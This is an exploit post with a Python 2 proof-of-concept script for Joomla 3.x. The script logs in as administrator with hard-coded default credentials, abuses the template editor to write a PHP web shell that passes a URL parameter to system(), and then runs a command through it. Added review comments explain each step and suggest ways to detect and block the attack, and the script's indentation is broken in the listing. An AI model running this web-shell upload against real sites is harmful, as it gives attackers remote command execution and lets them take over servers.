Joomla 3.x Proof Of Concept Shell Upload

This proof of concept code shows how administrator functionality can be abused in Joomla to upload a shell.


MD5 | 5342f1f41088abee2af959b87cbce235


c@kali:~/src/napalm2.2/modules$ cat shell-joomla.py
#!/usr/bin/env python
# joomla_shellup.py - small script to upload shell in Joomla
#
# 02.05.2017, rewritten: 27.05
# -- hint --
# To exploit this "feature" you will need valid credentials.
# Based on latest (3.6.5-1) version.
# Tested also on: 3.7.x


import requests
import re

# Base URL of the Joomla instance under test. raw_input and the bare
# print statements below mean this script is Python 2 only.
target = raw_input("[+] Hostname >> ")

print '[+] Checking: ' + str(target)

# initGET
# One requests.Session carries the Joomla cookie through the login,
# the template-editor GET and the final POST.
session = requests.session()
initlink = target + '/administrator/index.php'

initsend = session.get(initlink)
initresp = initsend.text

# Joomla emits its anti-CSRF token as a hidden input whose *name* is the
# token and whose value is "1"; the regex captures that name from the
# administrator login form.
find_token = re.compile('<input type="hidden" name="(.*?)" value="1"/>')
found_token = re.search(find_token, initresp)

# NOTE(review): the listing has lost its indentation -- the two lines after
# this `if` (and the two after `if newFound:` further down) were presumably
# its body. No else-branch exists: if the token is not found, the dict
# literal below raises NameError on initToken.
if found_token:
initToken = found_token.group(1)
print '[+] Found init token: ' + initToken

print '[+] Preparing login request'
# Hard-coded administrator credentials (user/bitnami looks like the Bitnami
# stack default -- TODO confirm). This is the precondition stated in the
# header comment: the script exploits no authentication weakness, it relies
# on a valid admin login. 'return' is base64 of "index.php"; the token name
# is sent as a key with value '1', mirroring the hidden input.
data_login = {
'username':'user',
'passwd':'bitnami',
'lang':'',
'option':'com_login',
'task':'login',
'return':'aW5kZXgucGhw',
initToken:'1'
}
data_link = initlink
doLogin = session.post(data_link, data=data_login)
loginResp = doLogin.text

# NOTE(review): loginResp is never inspected; the script assumes the login
# succeeded and continues regardless of status code or error message.
print '[+] At this stage we should be logged-in as an admin :)'

# Template editor (com_templates, view=template). `id=503` is an extension
# id -- presumably the beez3 template, judging by path2shell below; TODO
# confirm. `file=` is the URL-encoded base64 of "/jsstrings.php", the
# template file the editor is asked to open.
uplink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
filename = 'jsstrings.php'
print '[+] File to change: ' + str(filename)

getnewtoken = session.get(uplink)
getresptoken = getnewtoken.text

# Fresh CSRF token for the now-authenticated session (same regex as above).
newToken = re.compile('<input type="hidden" name="(.*?)" value="1"/>')
newFound = re.search(newToken, getresptoken)

if newFound:
newOneTok = newFound.group(1)
print '[+] Grabbing new token from logged-in user: ' + newOneTok

# The same editor page is fetched a second time; getjsresp is only
# referenced by the commented-out print below.
getjs = target+'/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
getjsreq = session.get(getjs)
getjsresp = getjsreq.text

# print getjsresp
print '[+] Shellname: ' + filename
# The write itself: task=template.apply is the editor's save/apply task and
# jform[source] becomes the new file body -- by-design administrator
# functionality, which is why admin credentials equal code execution here.
# From the defender's side this is the event to alert on: an authenticated
# POST to com_templates with task=template.apply that stores PHP code in a
# template file, followed by a direct request to that file under /templates/.
# File-integrity monitoring of the templates directory, or making it
# non-writable to the web-server user, breaks the chain independent of how
# the credentials were obtained.
shlink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA='
shdata_up = {
'jform[source]':'<?php system($_GET["x"]);',
'task':'template.apply',
newOneTok:'1',
'jform[extension_id]':'503',
'jform[filename]':'/'+filename
}
shreq = session.post(shlink, data=shdata_up)
# Web path of the file the editor saved; the `x` query parameter is passed
# unfiltered to system() by the PHP written above.
path2shell = '/templates/beez3/jsstrings.php?x=id'
print '[+] Shell is ready to use: ' + str(path2shell)
print '[+] Checking:'
# shreq is reused for the verification GET; its body is the command output.
shreq = session.get(target + path2shell)
shresp = shreq.text

print shresp

print '\n[+] Module finished.'


